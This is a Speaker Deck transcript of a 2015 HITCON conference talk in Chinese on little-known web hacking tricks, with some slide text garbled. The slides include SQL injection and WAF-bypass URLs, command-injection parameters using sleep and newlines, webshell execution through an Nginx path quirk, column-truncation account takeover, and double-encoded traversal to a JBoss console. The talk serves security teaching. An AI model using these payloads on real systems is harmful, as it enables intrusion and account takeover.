Upgrade to Pro — share decks privately, control downloads, hide ads and more …

那些 Web Hacking 中的奇技淫巧

Avatar for Orange Orange
August 28, 2015
Technology
16
14k

那些 Web Hacking 中的奇技淫巧

HITCON 2015 Community 演講投影片

Avatar for Orange

Orange

August 28, 2015
Tweet

More Decks by Orange

See All by Orange
Best Practices - The Upload
Avatar for Orange p8361
0
130
Security in PHP 那些在滲透測試的小技巧
Avatar for Orange p8361
0
240
網頁安全 Web Security 入門
Avatar for Orange p8361
0
230
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
Avatar for Orange p8361
13
36k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
Avatar for Orange p8361
6
13k
PHPConf 2013 - 矛盾大對決
Avatar for Orange p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
Avatar for Orange p8361
15
12k
駭客看 Django
Avatar for Orange p8361
25
13k

Other Decks in Technology

See All in Technology
分析画面のクリック操作をそのままコード化 ! エンジニアとビジネスユーザーが共存するAI-ReadyなBI基盤
Avatar for ikumi ikumi
0
130
ZOZOにおけるAI活用の現在 ~開発組織全体での取り組みと試行錯誤~
Avatar for ZOZO Developers zozotech
PRO
4
4.7k
Amazon S3 Vectorsを使って資格勉強用AIエージェントを構築してみた
Avatar for usanchuu usanchuu
3
420
小さく始めるBCP ― 多プロダクト環境で始める最初の一歩
Avatar for kekke-n kekke_n
1
310
Sansan Engineering Unit 紹介資料
Avatar for Sansan, Inc. sansan33
PRO
1
3.8k
0205_Claude_CodeでSEOを最適化する_AI_Ops_Community_Vol.2__マーケティングx_AIはここまで進化した__.pdf
Avatar for Riku Ogasawara riku_423
0
150
制約が導く迷わない設計 〜 信頼性と運用性を両立するマイナンバー管理システムの実践 〜
Avatar for ないとー bwkw
2
810
Tebiki Engineering Team Deck
Avatar for Tebiki, Inc. tebiki
0
24k
Bill One急成長の舞台裏 開発組織が直面した失敗と教訓
Avatar for SansanTech sansantech
PRO
1
180
使いにくいの壁を突破する
Avatar for SansanTech sansantech
PRO
1
100
Introduction to Sansan, inc / Sansan Global Development Center, Inc.
Avatar for Sansan, Inc. sansan33
PRO
0
3k
顧客との商談議事録をみんなで読んで顧客解像度を上げよう
Avatar for shibayu36 shibayu36
0
130

Featured

See All Featured
Leveraging Curiosity to Care for An Aging Population
Avatar for Cassini Nazir cassininazir
1
150
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
Avatar for Irina Nazarova irinanazarova
9
1.2k
Scaling GitHub
Avatar for Zach Holman holman
464
140k
Practical Tips for Bootstrapping Information Extraction Pipelines
Avatar for Matthew Honnibal honnibal
25
1.7k
Context Engineering - Making Every Token Count
Avatar for Addy Osmani addyosmani
9
640
Facilitating Awesome Meetings
Avatar for Lara Hogan lara
57
6.7k
More Than Pixels: Becoming A User Experience Designer
Avatar for Michelle Schulp Hunt marktimemedia
3
310
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
Avatar for Eileen M. Uchitelle eileencodes
141
34k
Utilizing Notion as your number one productivity tool
Avatar for Mfonobong Umondia mfonobong
2
210
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
Avatar for Michelle Schulp Hunt marktimemedia
31
2.7k
How Software Deployment tools have changed in the past 20 years
Avatar for Geshan Manandhar geshan
0
32k
Beyond borders and beyond the search box: How to win the global "messy middle" with AI-driven SEO
Avatar for David Carrasco davidcarrasco
1
47

Transcript

  1. 掄ⅼ9GD*CEMKPIℎ䥥Ⱘ㕡䃌ト QTCPIG"EJTQQVQTI

  2. #DQWV/G • 蔡政達 a.k.a Orange • CHROOT 成員 / HITCON

    成員 / DEVCORE 資安顧問 • 國內外研討會 HITCON, AVTokyo, WooYun 等講師 • 國內外駭客競賽 Capture the Flag 冠軍 • 揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱 點漏洞 • 專精於駭客⼿手法、Web Security 與網路滲透 #90後 #賽棍 #電競選⼿手 #滲透師 #Web狗 #

  3. – 講 Web 可以講到你們聽不懂就贏了 聅⬕䇵巼㧤㧪㉩⯻粕ㇰ䮝

  4. – 「⿊黑了你,從不是在你知道的那個點上」 ׅ箞㌈哨䇰㿿׆

  5. – 擺在你眼前是 Feature、擺在駭客眼前就是漏洞 ׅ箞㌈哨䇰㿿׆

  6. - 別⼈人笑我太瘋癲,我笑他⼈人看不穿 ׅ㋾惐哨䇰㿿׆

  7. - 猥瑣「流」 ׅ㋾惐哨䇰㿿׆

  8. None

  9. Q: 資料庫中的密碼破不出來怎麼辦?

  10. ׅⓧ⽅哨䇰㿿׆

  11. 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全

    後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 XSS XXE SQL Injection CSRF

  12. 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全

    後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 Struts2 OGNL RCE Rails YAML RCE PHP Memory UAF XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection Length Extension Attack ShellShock HeartBleed JSONP Hijacking FastCGI RCE NPRE RCE OVERLAYFS Local Root CSRF Bit-Flipping Attack

  13. ⃮㋶䰿⃡緈䥥⻮㔬苌⛋㋶彍⃡緈䥥楫⚬ 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架

    安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 ↛䥥瞗瓴

  14. 哪⋬

  15. - Perl 語⾔言特性導致網⾴頁應⽤用程式漏洞 Z

  16. @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'

    => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # ? $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; 2GTN嵿峡箞㌈

  17. @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'

    => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # wrong! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') }; 2GTN嵿峡箞㌈

  18. @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'

    => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # correct! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; 2GTN嵿峡箞㌈

  19. $WI<KNNC%8' my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname

    => $cgi->param('realname'), cryptpassword => $password });

  20. $WI<KNNC%8' my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname

    => $cgi->param('realname'), cryptpassword => $password }); # index.cgi? realname=xxx&realname=login_name&realname= admin

  21. - Windows 特性造成網⾴頁應⽤用限制繞過 Z

  22. 9KPFQYU箞㌈职㓱傓櫢㒪䠉椱┗ 儿職 • Windows API 檔名正規化特性 - shell.php # shel>.php

    # shell"php # shell.< • Windows Tilde 短檔名特性 - /backup/20150707_002dfa0f3ac08429.zip - /backup/201507~1.zip • Windows NTFS 特性 - download.php::$data

  23. – 講些⽐比較特別的應⽤用就好 揞勢㭸巼┑箊㙪Ⅷ

  24. ┊䠉06(5箞㌈儿職/[53. RNWIKPAFKT椱┗ • MySQL UDF 提權 - MySQL 5.1 -

    @@plugin_dir - Custom Dir -> System Dir -> Plugin Dir • 簡單說就是利⽤用 into outfile 建⽴立⺫⽬目錄 - INTO OUTFILE 'plugins::$index_allocation' - mkdir plugins

  25. – 對系統特性的不了解會導致「症狀解」 ׅ箞㌈哨䇰㿿׆

  26. – 講三個較為有趣並被⼈人忽略的特性與技巧 ׅ9GD*CEMKPIℎ䥥Ⱘ㕡䃌ト׆

  27. 㹄屰孉䰛ㇰ碍嬭箞㌈ • 問題點 - 未正確的使⽤用正規表⽰示式導致⿊黑名單被繞過 • 範例 - WAF 繞過

    - 防禦繞過

  28. - 中⽂文換⾏行編碼繞過網⾴頁應⽤用防⽕火牆規則 ㎦⭤⃡

  29. http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*三*/FROM dual--

  30. http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual--

  31. http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual-- %u4E0A %u4D0A ...

  32. - 繞過防禦限制繼續 Exploit ㎦⭤Ⅽℬ⃡

  33. for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }

    exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg &arg[1]=800 &arg[2]=600

  34. for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }

    exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg|sleep 7| &arg[1]=800;sleep 7; &arg[2]=600$(sleep 7)

  35. for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }

    exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg%0A &arg[1]=sleep &arg[2]=7%0A

  36. - 繞過防禦限制繼續 Exploit ㎦⭤ⅭℬⅭ

  37. - 駭客透過 Nginx ⽂文件解析漏洞成功執⾏行 Webshell ㎦⭤ⅭℬⅭ 是 PHP 問題,某⽅方⾯面也不算問題(?)所也沒有 CVE

    PHP 後⾯面版本以 Security by Default 防⽌止此問題

  38. 差不多是這種狀況 http://hackme.cc/avatar.gif/foo.php

  39. ; Patch from 80sec if ($fastcgi_script_name ~ ..*/.*php) { return

    403; } ㎦⭤ⅭℬⅭ http://www.80sec.com/nginx-securit.html

  40. It seems to work http://hackme.cc/avatar.gif/foo.php

  41. But ... http://hackme.cc/avatar.gif/%0Afoo.php

  42. NewLine security.limit_extensions (>PHP 5.3.9) *QYVQ2CVEJ!

  43. /[53.紉䮝⩬㐬截碍箞㌈ • 問題點 - 對資料不了解,設置了錯誤的語系、資料型態 • 範例 - ⼆二次 SQL

    注⼊入 - 字符截斷導致 ...

  44. - 輸⼊入內容⼤大於指定形態⼤大⼩小之截斷 ㎦⭤⃡

  45. $name = $_POST['name']; $r = query('SELECT * FROM users WHERE

    name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...)

  46. mysql> CREATE TABLE users ( -> id INT, -> name

    VARCHAR(255), -> pass VARCHAR(255) -> ); Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO users VALUES(2, 'admin ... x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+------------------+------+ | id | name | pass | +------+------------------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+------------------+------+ 2 rows in set (0.00 sec)

  47. name: admin ... x *QYVQ'ZRNQKV [space] x 250

  48. CVE-2009-2762 WordPress 2.6.1 Column Truncation Vulnerability *QYVQ'ZRNQKV

  49. - CREATE TABLE users (id INT, name TEXT, ...) ⻰宽瓱6':6⩬㐬㋯熝抇獑

  50. CVE-2015-3440 WordPress 4.2.1 Truncation Vulnerability ⻰宽瓱6':6⩬㐬㋯熝抇獑

  51. - Unicode 編碼之截斷 ㎦⭤Ⅽ

  52. $name = $_POST['name']; if (strlen($name) > 16) die('name too long');

    $r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) DEFAULT CHARSET=utf8

  53. mysql> CREATE TABLE users ( -> id INT, -> name

    VARCHAR(255), -> pass VARCHAR(255) -> ) DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.01 sec) mysql> INSERT INTO users VALUES(2, 'adminx', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+-------+------+ | id | name | pass | +------+-------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+-------+------+ 2 rows in set (0.00 sec)

  54. name: adminx *QYVQ'ZRNQKV

  55. CVE-2013-4338 WordPress < 3.6.1 Object Injection Vulnerability CVE-2015-3438 WordPress <

    4.1.2 Cross-Site Scripting Vulnerability *QYVQ'ZRNQKV

  56. - 錯誤的資料庫欄位型態導致⼆二次 SQL 注⼊入 ⻰宽瓱

  57. #靠北⼯工程師 10418 htp://j.mp/1KiuhRZ

  58. $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist

    VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // CREATE TABLE blacklist(id TEXT, uid TEXT, ...)

  59. $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist

    VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // uid=0x31206f7220313d31 # 1 or 1=1

  60. sql_mode = strict utf8mb4 *QYVQ2CVEJ!

  61. 9GD∛㧮⥉ⓧ⽅㪗㲬䇰㿿 • 問題發⽣生情境 - 使⽤用多個網⾴頁伺服器相互處理 URL ( 如 ProxyPass, mod_jk...

    )

  62. http://hackme.cc/jmx-console/

  63. http://hackme.cc/sub/.%252e/ jmx-console/ Deploy to GetShell

  64. • workers.properti es - worker.ajp1.port= 8009 - worker.ajp1.host= 127.0.0.1 -

    worker.ajp1.type= ajp13 • uriworkermap.pro perties - /sub/*=ajp1 - /sub=ajp1

  65. http://hackme.cc/sub/../jmx-console/ Apache http://hackme.cc/sub/../jmx-console/ not matching /sub/*, return 404

  66. http://hackme.cc/sub/.%2e/jmx-console/ Apache http://hackme.cc/sub/.%252e/jmx-console/ http://hackme.cc:8080/sub/.%2e/jmx-console/ JBoss http://hackme.cc:8080/sub/../jmx-console/ mod_jk

  67. • HITCON 2014 CTF - 2 / 1020 解出 •

    舊版 ColdFusion 漏洞 - ColdFusion with Apache Connector - 舊版本 ColdFusion Double Encoding 造成資訊洩漏 漏洞

  68. http://hackme.cc/admin%252f %252ehtaccess%2500.cfm

  69. Apache http://hackme.cc/admin/.htaccess <FilesMatch "^\.ht">, return 403

  70. Apache http://hackme.cc/admin%252f.htaccess /admin%2f.htaccess not found, return 404 http://hackme.cc/admin%2f.htaccess

  71. Apache http://hackme.cc/admin%252f.htaccess%2500.cfm End with .cfm, pass to ColdFusion http://hackme.cc/admin%2f.htaccess%00.cfm ColdFusion

    http://hackme.cc/admin/.htaccess .cfm http://hackme.cc/admin%2f.htaccess%00.cfm

  72. *QYVQ2CVEJ!

  73. 3#